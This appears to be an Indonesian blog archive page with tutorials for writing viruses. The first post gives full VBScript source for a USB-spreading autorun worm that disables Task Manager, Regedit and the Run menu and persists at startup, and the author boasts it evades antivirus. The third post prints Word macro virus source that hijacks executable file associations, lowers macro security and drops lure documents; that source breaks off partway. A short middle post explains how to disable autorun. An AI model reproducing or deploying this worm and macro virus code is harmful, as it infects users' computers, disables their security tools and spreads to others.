.

Home » Posts filed under Viruzz

Membuat Virus Sederhana – Notepad

Di Terbitkan Oleh Muhammad Fiqri Haikal - 0 komentar


Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
1
2
//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
1
2
//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
1
2
3
4
5
6
7
8
9
10
11
12
13
//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = [autorun] & vbcrlf & shellexecute=wscript.exe k4l0n6.dll.vbs
set fs = createobject(Scripting.FileSystemObject)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
1
2
3
4
5
6
7
8
9
10
11
//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs )
tf.attributes = 32
set tf=fs.createtextfile(windowpath & \batch- k4l0n6.dll.vbs,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs )
tf.attributes = 39
//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
1
2
3
for each flashdrive in fs.drives
//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> A: then
1
2
3
4
5
6
7
8
//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &\k4l0n6.dll.vbs )
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &\k4l0n6.dll.vbs ,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &\k4l0n6.dll.vbs )
tf.attributes = 39
1
2
3
4
5
6
7
8
9
10
//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes=39
end if
next
1
//–Manipulasi Registry–//
1
set kalong = createobject(WScript.Shell)
1
2
//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title, THE KALONG v.s. ZAY
1
2
//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden, 0, REG_DWORD
1
2
3
4
5
6
//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1, REG_DWORD
1
2
//–Manip – Disable klik kanan–//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu, 1, REG_DWORD
1
2
//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption, Worm Kalong. Variant from Rangga-Zay, dont panic all data are safe.
1
2
//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir, windowpath & \batch- k4l0n6.dll.vbs
1
2
3
//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, The Batrix
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner,Kalong
1
2
3
4
5
6
7
8
//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(Wscript.shell)
sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname
Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
Label:

Disable Autorun.inf Menghindari Virus

Di Terbitkan Oleh Muhammad Fiqri Haikal - 0 komentar

Beberapa orang ada yang berpikir bahwa file autorun.inf adalah virus, padahal sebenarnya bukan. Autorun.inf adalah suatu sistem file yang digunakan oleh sistem operasi seperti Windows agar secara otomatis menjalankan program ketika removable media seperti CD-ROM, DVD-ROM atau USB Flash dimasukkan di komputer. untuk alasan kenyamanan fitur ini dirancang agar sebuah software yang dipasang pada sebuah disk dapat secara otomatis start saat disk dimasukkan.

Sayangnya autorun.inf ternyata menimbulkan masalah baru. fitur ini dimanfaatkan untuk penyebaran virus. keamanan pengguna pun terancam, mereka yang tidak berniat untuk menjalankan sebuah software terpaksa harus terbelalak dengan kondisi tak mampu berbuat apa-apa untuk menghentikan virus yang langsung berakasi, seperti dalam kasus beberapa virus, yang memanfaatkan fitur ini untuk menyebarkan. ini disebut Sebuah fitur Windows telah gagal ?

Me Non aktifkan AutoPlay bukan solusi karena ketika Anda membuka drive dari My Computer, Windows masih akan menjalankan instruksi yang ditemukan di autorun.inf.

Ada perbedaan antara Autoplay dan Autorun. Autoplay adalah ketika Anda memasukkan CD / DVD atau USB flash drive, Anda mendapatkan kotak dialog yang menanyakan apa yang ingin Anda lakukan Windows, sedangkan autorun akan langsung mengeksekusi perintah yang ada di file autorun.inf. dan ketika ini berjalan tidak ada sama sekali kesempatan bagi Anda untuk membatalkan autorun.
Cara menonaktifkan autorun.
Langkah 1 : Click Start->Run atau tekan tombol Window + R pada keyboard untuk menampilkan kotak dialog Run.
Langkah 2 : Ketik regedit lalu tekan Enter untuk menjalankan Registry Editor.
Langkah 3 : Pada kiri, panel klik ganda folder untuk memperluas dan pergi ke
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Langkah 4 : Pada panel sebelah kanan double klik NoDriveTypeAutoRun
Langkah 5 : Pada Value Data , ketik FF untuk Heksadesimal atau 255 untuk nilai desimal.
Langkah 6 : Tutup Registry Editor dan restart komputer.
Cara menonaktifkan autorun dengan Notepad
Berikut ini adalah kunci registri yang bisa Anda gunakan untuk mem blok autorun.inf. Buka notepad atau teks editor lainnya, salin teks di bawah ini dan simpan sebagai NoAutoRun.reg. Pastikan save dengan ekstensi . Reg bukan. Txt.
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutorun.inf]
@ = “@ SYS: DoesNotExist”
Jalankan file tersebut, klik Yes jika ada konfirmasi.
Masalah dengan hack ini adalah bahwa installer CD atau DVD tidak akan lagi berjalan secara otomatis, anda harus mencari file setup dengan manual. tapi saya pikir bukanlah masalah besar dibandingkan dengan jika terinfeksi oleh virus dan harus menghabiskan berjam-jam membersihkannya.
Label:

Cara Membuat Viruss

Di Terbitkan Oleh Muhammad Fiqri Haikal - 0 komentar
Pendahuluan
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Cara Kerja
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD, OS/2 IBM, dan Sun Operating System. Virus yang ganas akan merusak perangkat keras.
(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)
Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.
Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).
Pasti banyak bertanya kenapa kali ini membahas tentang cara membuat virus? Biasanya kan lebih sering membahas analisis virus atau antivirusnya itu….
Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.
Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS
  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

  • Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.


Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, aku dah siapkan kok sourcenya. Makan neh source code!
1
<span style="color: #ff0000;">This is my codes virus</span>
1
<span style="color: #ff0000;"></span>
1
<span style="color: #ff0000;">Macro Viruses</span>
1
<span style="color: #ff0000;">[Macroid]</span>
1
<span style="color: #ff0000;"></span>
1
<span style="color: #ff0000;">Hanya untuk pembelajaran</span>
1
<span style="color: #ff0000;">Private Sub Document_Close()</span>
1
<span style="color: #ff0000;">Dim AD, NT As Object</span>
1
<span style="color: #ff0000;">Dim isi As String</span>
1
<span style="color: #ff0000;">Set AD = ActiveDocument.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">Set NT = NormalTemplate.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">If AD.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">AD.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">AD.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">ActiveDocument.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If NT.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">NT.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">NT.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">NormalTemplate.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If InStr(ActiveDocument.Content, Macroid) = 0 Then</span>
1
<span style="color: #ff0000;">ActiveDocument.Content = [Macroid] &amp; vbCrLf &amp; ActiveDocument.Content &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; [Macroid] by Morphic &amp; vbCrLf &amp; copyright(c) Medan Juli-2008</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim b As Object</span>
1
<span style="color: #ff0000;">Set b = CreateObject(Wscript.Shell)</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title, Browser Internet ini diambil alih oleh Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, VM-Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText, Macroid-A. Eat this!!! Ha ha ha</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden, 2</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\, Tong Sampah Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\, Komputer Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\exefile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\comfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\txtfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\scrfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\batfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shell\, 0pen</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\, &amp;Open</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\command\, wscript.exe &amp; Environ$(windir) &amp; \avmc.vbs</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim rog As Integer</span>
1
<span style="color: #ff0000;">Dim atr, vbs, Tipu(10), Trik(10) As String</span>
1
<span style="color: #ff0000;">For a = 66 To 90</span>
1
<span style="color: #ff0000;">partisi = Chr$(a)</span>
1
<span style="color: #ff0000;">vbs = partisi &amp; :\auto.vbs</span>
1
<span style="color: #ff0000;">atr = partisi &amp; :\autorun.inf</span>
1
<span style="color: #ff0000;">Tipu(1) = partisi &amp; :\Soal SPMB 1995-2008.doc</span>
1
<span style="color: #ff0000;">Tipu(2) = partisi &amp; :\Kisah di balik HarryPotter.doc</span>
1
<span style="color: #ff0000;">Tipu(3) = partisi &amp; :\Titip File sebentar.doc</span>
1
<span style="color: #ff0000;">Tipu(4) = partisi &amp; :\jangan di baca.doc</span>
1
<span style="color: #ff0000;">Tipu(5) = partisi &amp; :\buku harian.doc</span>
1
<span style="color: #ff0000;">Tipu(6) = partisi &amp; :\cerita hangat.doc</span>
1
<span style="color: #ff0000;">Tipu(7) = partisi &amp; :\Punya Baim.doc</span>
1
<span style="color: #ff0000;">Tipu(8) = partisi &amp; :\Teka-teki yang baru.doc</span>
1
<span style="color: #ff0000;">Tipu(9) = partisi &amp; :\Kumpulan cerita lucu.doc</span>
1
<span style="color: #ff0000;">Tipu(10) = partisi &amp; :\Trik Sulap.doc</span>
1
<span style="color: #ff0000;">If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rog = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Tipu(rog) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Trik(1) = partisi &amp; :\Novel J.K.Rowling.doc</span>
1
<span style="color: #ff0000;">Trik(2) = partisi &amp; :\cerita cinta.doc</span>
1
<span style="color: #ff0000;">Trik(3) = partisi &amp; :\Ringkasan cerita HarryPotter.doc</span>
1
<span style="color: #ff0000;">Trik(4) = partisi &amp; :\Semua Cheat game DOTA.doc</span>
1
<span style="color: #ff0000;">Trik(5) = partisi &amp; :\Kumpulan Cheat game.doc</span>
1
<span style="color: #ff0000;">Trik(6) = partisi &amp; :\Cheat game RF.doc</span>
1
<span style="color: #ff0000;">Trik(7) = partisi &amp; :\Cheat game Ayo Dance.doc</span>
1
<span style="color: #ff0000;">Trik(8) = partisi &amp; :\Goosebumps.doc</span>
1
<span style="color: #ff0000;">Trik(9) = partisi &amp; :\FearStreet.doc</span>
1
<span style="color: #ff0000;">Trik(10) = partisi &amp; :\R.L.Stine.doc</span>
1
<span style="color: #ff0000;">If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rogi = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Trik(rogi) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Open atr For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, [Autorun]</span>
1
<span style="color: #ff0000;">Print #1, shell\Open\command=wscript.exe auto.vbs</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr atr, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Open vbs For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, dim a</span>
1
<span style="color: #ff0000;">Print #1, set a = createobject( &amp; Chr(34) &amp; Wscript.shell &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\10.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\11.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\12.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr vbs, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Next a</span>
1
<span style="color: #ff0000;">If Dir(Environ$(windir) &amp; \Macroid.doc) = “” Then</span>
1
<span style="color: #ff0000;">Dim isicrita As String</span>
1
<span style="color: #ff0000;">isicrita = [Macroid] by Morphic &amp; vbCrLf &amp; Copyright(c) Medan Juli-2008 &amp; vbCrLf &amp; vbCrLf &amp; _</span>
1
<span style="color: #ff0000;">Chr(34) &amp; Ms.Word is a thing that can be used as a power to break everything. &amp; Chr(34) &amp; vbCrLf &amp; (Morphic)</span>
1
<span style="color: #ff0000;">Open Environ$(windir) &amp; \Macroid.doc For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, isicrita</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If Dir(Environ$(windir) &amp; \avmc.vbs) = “” Then</span>
1
<span style="color: #ff0000;">Open Environ$(windir) &amp; \avmc.vbs For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, set fs = createobject( &amp; Chr(34) &amp; Scripting.FileSystemObject &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, for each FD in fs.drives</span>
1
<span style="color: #ff0000;">Print #1, if (FD.Drivetype = 1) and FD.Path &lt;&gt; &amp; Chr(34) &amp; A: &amp; Chr(34) &amp; then</span>
1
<span style="color: #ff0000;">Print #1, set tf = fs.CreateTextFile(FD.Path &amp; Chr(38) &amp; Chr(34) &amp; \Jangan di baca.doc &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, end if</span>
1
<span style="color: #ff0000;">Print #1, Next</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">ActiveDocument.Save</span>
1
<span style="color: #ff0000;">NormalTemplate.Save</span>
1
<span style="color: #ff0000;">End Sub</span>
1
<span style="color: #ff0000;">Private Sub Document_Open()</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Macro).Visible = False</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Macro).Enabled = False</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Customize…”).Visible = False</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Options…”).Visible = False</span>
1
<span style="color: #ff0000;">Dim AD, NT As Object</span>
1
<span style="color: #ff0000;">Dim isi As String</span>
1
<span style="color: #ff0000;">Set AD = ActiveDocument.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">Set NT = NormalTemplate.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">If AD.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">AD.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">AD.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">ActiveDocument.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If NT.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">NT.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">NT.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">NormalTemplate.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If InStr(ActiveDocument.Content, Macroid) = 0 Then</span>
1
<span style="color: #ff0000;">ActiveDocument.Content = [Macroid] &amp; vbCrLf &amp; ActiveDocument.Content &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; [Macroid] by Morphic &amp; vbCrLf &amp; copyright(c) Medan Juli-2008</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim b As Object</span>
1
<span style="color: #ff0000;">Set b = CreateObject(Wscript.Shell)</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title, Browser Internet ini diambil alih oleh Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, VM-Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText, Macroid-A. Eat this!!! Ha ha ha</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden, 2</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\, Tong Sampah Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\, Komputer Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\exefile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\comfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
